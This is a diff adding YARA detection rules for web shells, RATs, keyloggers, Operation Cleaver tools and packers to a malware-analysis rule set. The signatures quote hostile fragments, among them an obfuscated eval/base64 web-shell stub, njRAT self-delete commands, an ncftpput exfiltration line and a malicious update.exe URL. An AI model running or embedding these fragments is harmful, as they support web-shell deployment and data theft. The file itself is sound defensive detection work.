+	meta:
+		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d28445de424594a5f14d0fe2a7c4e94f"
+	strings:
+		$s0 = "r57shell" fullword 
+		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+		$s2 = "RusH security team"
+		$s3 = "'ru_text12' => 'back-connect"
+	condition:
+		1 of them
+}
+rule rst_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0961641a4ab2b8cb4d2beca593a92010"
+	strings:
+		$s0 = "C:\\tmp\\dump_"
+		$s1 = "RST MySQL"
+		$s2 = "http://rst.void.ru"
+		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+	condition:
+		2 of them
+}
+rule wh_bindshell_py {
+	meta:
+		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fab20902862736e24aaae275af5e049c"
+	strings:
+		$s0 = "#Use: python wh_bindshell.py [port] [password]"
+		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+	condition:
+		1 of them
+}
+rule lurm_safemod_on_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5ea4f901ce1abdf20870c214b3231db3"
+	strings:
+		$s0 = "Network security team :: CGI Shell" fullword
+		$s1 = "#########################<<KONEC>>#####################################" fullword
+		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+	condition:
+		1 of them
+}
+rule c99madshell_v2_0_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d27292895da9afa5b60b9d3014f39294"
+	strings:
+		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+	condition:
+		all of them
+}
+rule backupsql_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+	strings:
+		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+	condition:
+		all of them
+}
+rule uploader_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0b53b67bb3b004a8681e1458dd1895d0"
+	strings:
+		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+	condition:
+		2 of them
+}
+rule telnet_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dd9dba14383064e219e29396e242c1ec"
+	strings:
+		$s0 = "W A R N I N G: Private Server"
+		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
+	condition:
+		all of them
+}
+rule w3d_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "987f66b29bfb209a0b4f097f84f57c3b"
+	strings:
+		$s0 = "W3D Shell"
+		$s1 = "By: Warpboy"
+		$s2 = "No Query Executed"
+	condition:
+		2 of them
+}
+
+
+rule rtf_yahoo_ken
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Yahoo Ken"
+	filetype = "RTF"
+	version = "0.1"
+	description = "Test rule"
+	date = "2013-12-14"
+strings:
+	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+	$author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken"
+condition:
+	($magic1 or $magic2 or $magic3 at 0) and $author1
+} 
+
+
+rule ZXProxy
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+	
+strings:
+	$C = "\\Control\\zxplug" nocase wide ascii
+	$h = "http://www.facebook.com/comment/update.exe" wide ascii
+	$S = "Shared a shell to %s:%s Successfully" nocase wide ascii
+condition:
+	any of them
+}
+
+rule OrcaRAT
+{
+    meta:
+        Author      = "PwC Cyber Threat Operations"
+        Date        = "2014/10/20" 
+        Description = "Strings inside"
+        Reference   = "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
+
+    strings:
+        $MZ = "MZ"
+        $apptype1 = "application/x-ms-application"
+        $apptype2 = "application/x-ms-xbap"
+        $apptype3 = "application/vnd.ms-xpsdocument"
+        $apptype4 = "application/xaml+xml"
+        $apptype5 = "application/x-shockwave-flash"
+        $apptype6 = "image/pjpeg"
+        $err1 = "Set return time error =   %d!"
+        $err2 = "Set return time   success!"
+        $err3 = "Quit success!"
+
+    condition:
+        $MZ at 0 and filesize < 500KB and (all of ($apptype*) and 1 of ($err*))
+}
diff -Nru remnux-rules-0.0.3/yara.old/Naikon.yara remnux-rules-0.0.4/yara.old/Naikon.yara
--- remnux-rules-0.0.3/yara.old/Naikon.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Naikon.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NaikonCode : Naikon Family 
+{
+    meta:
+        description = "Naikon code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+    
+    strings:
+        // decryption
+        $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eah, 1fh
+        $ = { 35 5A 01 00 00} // xor eax, 15ah
+        $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh
+    
+    condition:
+        all of them
+}
+
+rule NaikonStrings : Naikon Family
+{
+    meta:
+        description = "Naikon Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "NOKIAN95/WEB"
+        $ = "/tag=info&id=15"
+        $ = "skg(3)=&3.2d_u1"
+        $ = "\\Temp\\iExplorer.exe"
+        $ = "\\Temp\\\"TSG\""
+        
+    condition:
+       any of them
+}
+
+rule Naikon : Family
+{
+    meta:
+        description = "Naikon"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        NaikonCode or NaikonStrings
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/naspyupdate.yara remnux-rules-0.0.4/yara.old/naspyupdate.yara
--- remnux-rules-0.0.3/yara.old/naspyupdate.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/naspyupdate.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,51 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule nAspyUpdateCode : nAspyUpdate Family 
+{
+    meta:
+        description = "nAspyUpdate code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+    
+    strings:
+        // decryption loop in dropper
+        $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
+        
+    condition:
+        any of them
+}
+
+rule nAspyUpdateStrings : nAspyUpdate Family
+{
+    meta:
+        description = "nAspyUpdate Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    strings:
+        $ = "\\httpclient.txt"
+        $ = "password <=14"
+        $ = "/%ldn.txt"
+        $ = "Kill You\x00"
+        
+    condition:
+        any of them
+}
+
+rule nAspyUpdate : Family
+{
+    meta:
+        description = "nAspyUpdate"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    condition:
+        nAspyUpdateCode or nAspyUpdateStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/NetPass.yara remnux-rules-0.0.4/yara.old/NetPass.yara
--- remnux-rules-0.0.3/yara.old/NetPass.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/NetPass.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NetpassStrings : NetPass Variant {
+
+        meta:
+                description = "Identifiers for netpass variant"
+                author = "Katie Kleemola"
+                last_updated = "2014-05-29"
+
+        strings:
+		$exif1 = "Device Protect ApplicatioN" wide
+		$exif2 = "beep.sys" wide //embedded exe name
+		$exif3 = "BEEP Driver" wide //embedded exe description
+		
+		$string1 = "\x00NetPass Update\x00"
+		$string2 = "\x00%s:DOWNLOAD\x00"
+		$string3 = "\x00%s:UPDATE\x00"
+		$string4 = "\x00%s:uNINSTALL\x00"
+
+        condition:
+                all of ($exif*) or any of ($string*)
+
+}	
+
+rule NetPass : Variant {
+	meta:
+		description = "netpass variant"
+		author = "Katie Kleemola"
+		last_updated = "2014-07-08"
+	condition:
+		NetpassStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/netwiredRC.yara remnux-rules-0.0.4/yara.old/netwiredRC.yara
--- remnux-rules-0.0.3/yara.old/netwiredRC.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/netwiredRC.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule NetWiredRC_B : rat 
+{
+	meta:
+		description = "NetWiredRC"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2014-12-23"
+		filetype = "memory"
+		version = "1.1" 
+
+	strings:
+		$mutex = "LmddnIkX"
+
+		$str1 = "%s.Identifier"
+		$str2 = "%d:%I64u:%s%s;"
+		$str3 = "%s%.2d-%.2d-%.4d"
+		$str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
+		$str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"
+		
+		$klg1 = "[Backspace]"
+		$klg2 = "[Enter]"
+		$klg3 = "[Tab]"
+		$klg4 = "[Arrow Left]"
+		$klg5 = "[Arrow Up]"
+		$klg6 = "[Arrow Right]"
+		$klg7 = "[Arrow Down]"
+		$klg8 = "[Home]"
+		$klg9 = "[Page Up]"
+		$klg10 = "[Page Down]"
+		$klg11 = "[End]"
+		$klg12 = "[Break]"
+		$klg13 = "[Delete]"
+		$klg14 = "[Insert]"
+		$klg15 = "[Print Screen]"
+		$klg16 = "[Scroll Lock]"
+		$klg17 = "[Caps Lock]"
+		$klg18 = "[Alt]"
+		$klg19 = "[Esc]"
+		$klg20 = "[Ctrl+%c]"
+
+	condition: 
+		$mutex or (1 of ($str*) and 1 of ($klg*))
+}
diff -Nru remnux-rules-0.0.3/yara.old/Njrat.yara remnux-rules-0.0.4/yara.old/Njrat.yara
--- remnux-rules-0.0.3/yara.old/Njrat.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Njrat.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Njrat
+{
+    meta:
+        description = "Njrat"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /(F)romBase64String/
+        $string2 = /(B)ase64String/
+        $string3 = /(C)onnected/ wide ascii
+        $string4 = /(R)eceive/
+        $string5 = /(S)end/ wide ascii
+        $string6 = /(D)ownloadData/ wide ascii
+        $string7 = /(D)eleteSubKey/ wide ascii
+        $string8 = /(g)et_MachineName/
+        $string9 = /(g)et_UserName/
+        $string10 = /(g)et_LastWriteTime/
+        $string11 = /(G)etVolumeInformation/
+        $string12 = /(O)SFullName/ wide ascii
+        $string13 = /(n)etsh firewall/ wide
+        $string14 = /(c)md\.exe \/k ping 0 & del/ wide
+        $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
+        $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
+        $string17 = {7C 00 27 00 7C 00 27 00 7C}
+
+    condition:
+        10 of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Notepad.yara remnux-rules-0.0.4/yara.old/Notepad.yara
--- remnux-rules-0.0.3/yara.old/Notepad.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Notepad.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule TROJAN_Notepad {
+    meta:
+        Author = "RSA_IR"
+        Date     = "4Jun13"
+        File     = "notepad.exe v 1.1"
+        MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
+    strings:
+        $s1 = "75BAA77C842BE168B0F66C42C7885997"
+        $s2 = "B523F63566F407F3834BCC54AAA32524"
+    condition:
+        $s1 or $s2
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/NSFree.yara remnux-rules-0.0.4/yara.old/NSFree.yara
--- remnux-rules-0.0.3/yara.old/NSFree.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/NSFree.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NSFreeCode : NSFree Family 
+{
+    meta:
+        description = "NSFree code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+    
+    strings:
+        // push vars then look for MZ
+        $ = { 53 56 57 66 81 38 4D 5A }
+        // nops then look for PE\0\0
+        $ = { 90 90 90 90 81 3F 50 45 00 00 }
+    
+    condition:
+        all of them
+}
+
+rule NSFreeStrings : NSFree Family
+{
+    meta:
+        description = "NSFree Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    strings:
+        $ = "\\MicNS\\" nocase
+        $ = "NSFreeDll" wide ascii
+        // xor 0x58 dos stub
+        $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 }
+        
+    condition:
+       any of them
+}
+
+rule NSFree : Family
+{
+    meta:
+        description = "NSFree"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    condition:
+        NSFreeCode or NSFreeStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/Olyx.yara remnux-rules-0.0.4/yara.old/Olyx.yara
--- remnux-rules-0.0.3/yara.old/Olyx.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Olyx.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule OlyxCode : Olyx Family 
+{
+    meta:
+        description = "Olyx code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
+        $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
+        
+    condition:
+        any of them
+}
+
+rule OlyxStrings : Olyx Family
+{
+    meta:
+        description = "Olyx Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
+       
+    condition:
+        any of them
+}
+
+rule Olyx : Family
+{
+    meta:
+        description = "Olyx"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        OlyxCode or OlyxStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Opcleaver.yara remnux-rules-0.0.4/yara.old/Opcleaver.yara
--- remnux-rules-0.0.3/yara.old/Opcleaver.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Opcleaver.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,335 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule OPCLEAVER_BackDoorLogger
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "BackDoorLogger"
+		$s2 = "zhuAddress"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_Jasus
+{
+	meta:
+		description = "ARP cache poisoner used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "pcap_dump_open"
+		$s2 = "Resolving IPs to poison..."
+		$s3 = "WARNNING: Gateway IP can not be found"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_LoggerModule
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "%s-%02d%02d%02d%02d%02d.r"
+		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_NetC
+{
+	meta:
+		description = "Net Crawler used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "NetC.exe" wide
+		$s2 = "Net Service"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_ShellCreator2
+{
+	meta:
+		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "ShellCreator2.Properties"
+		$s2 = "set_IV"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_SmartCopy2
+{
+	meta:
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "SmartCopy2.Properties"
+		$s2 = "ZhuFrameWork"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_SynFlooder
+{
+	meta:
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+		$s2 = "your target’s IP is : %s"
+		$s3 = "Raw TCP Socket Created successfully."
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_TinyZBot
+{
+	meta:
+		description = "Tiny Bot used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "NetScp" wide
+		$s2 = "TinyZBot.Properties.Resources.resources"
+		$s3 = "Aoao WaterMark"
+		$s4 = "Run_a_exe"
+		$s5 = "netscp.exe"
+		$s6 = "get_MainModule_WebReference_DefaultWS"
+		$s7 = "remove_CheckFileMD5Completed"
+		$s8 = "http://tempuri.org/"
+		$s9 = "Zhoupin_Cleaver"
+	condition:
+		(($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9)
+}
+
+rule OPCLEAVER_ZhoupinExploitCrew
+{
+	meta:
+		description = "Keywords used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "zhoupin exploit crew" nocase
+		$s2 = "zhopin exploit crew" nocase
+	condition:
+		1 of them
+}
+
+rule OPCLEAVER_antivirusdetector
+{
+	meta:
+		description = "Hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_csext
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "COM+ System Extentions"
+		$s2 = "csext.exe"
+		$s3 = "COM_Extentions_bin"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_kagent
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "kill command is in last machine, going back"
+		$s2 = "message data length in B64: %d Bytes"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_mimikatzWrapper
+{
+	meta:
+		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "mimikatzWrapper"
+		$s2 = "get_mimikatz"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_pvz_in
+{
+	meta:
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
+		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_pvz_out
+{
+	meta:
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Network Connectivity Module" wide
+		$s2 = "OSPPSVC" wide
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_wndTest
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "[Alt]" wide
+		$s2 = "<< %s >>:" wide
+		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhCat
+{
+	meta:
+		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
+		$s2 = "ABC ( A Big Company )" wide fullword
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhLookUp
+{
+	meta:
+		description = "Hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "zhLookUp.Properties"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhmimikatz
+{
+	meta:
+		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "MimikatzRunner"
+		$s2 = "zhmimikatz"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_Parviz_Developer
+{
+	meta:
+		description = "Parviz developer known from Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Florian Roth"
+		score = "70"
+	strings:
+		$s1 = "Users\\parviz\\documents\\" nocase
+	condition:
+		$s1 
+}
+
+rule OPCLEAVER_CCProxy_Config
+{
+	meta:
+		description = "CCProxy config known from Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Florian Roth"
+		score = "70"
+	strings:
+		$s1 = "UserName=User-001" fullword ascii
+		$s2 = "Web=1" fullword ascii
+		$s3 = "Mail=1" fullword ascii
+		$s4 = "FTP=0" fullword ascii
+		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
+	condition:
+		all of ($s*) or $x1 
+}
diff -Nru remnux-rules-0.0.3/yara.old/packer.yara remnux-rules-0.0.4/yara.old/packer.yara
--- remnux-rules-0.0.3/yara.old/packer.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/packer.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,20167 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule silent_banker : banker
+{
+      meta:
+		author="malware-lu"
+    strings: 
+        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}  
+        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
+        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
+
+    condition:
+        $a or $b or $c
+}
+
+rule zbot : banker
+{
+      meta:
+		author="malware-lu"
+     strings: 
+        $a = "__SYSTEM__" wide
+        $b = "*tanentry*"
+        $c = "*<option"
+        $d = "*<select"
+        $e = "*<input"
+
+     condition:
+        ($a and $b) or ($c and $d and $e)
+}
+
+rule banbra : banker
+{
+      meta:
+		author="malware-lu"
+    strings: 
+        $a = "senha" fullword nocase
+        $b = "cartao" fullword nocase
+        $c = "caixa" 
+        $d = "login" fullword nocase
+        $e = ".com.br"
+
+     condition:
+        #a > 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3              
+}
+
+rule Borland 
+{
+      meta:
+		author="malware-lu"
+	strings:
+		$patternBorland = "Borland" wide ascii
+	condition:
+		$patternBorland 
+}
+
+rule java 
+{
+      meta:
+		author="malware-lu"
+	strings:
+		$patternjava = "java" wide ascii
+	condition:
+		$patternjava
+}
+rule NET 
+{
+      meta:
+		author="malware-lu"
+	strings:
+		
+		$patternnet = ".NET" wide ascii
+	condition:
+		$patternnet
+}
+
+
+rule MSLRHv032afakePCGuard4xxemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 58 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector1XSukhovVladimirSergeNMarkin
+{
+      meta:
+		author="malware-lu"
+strings:
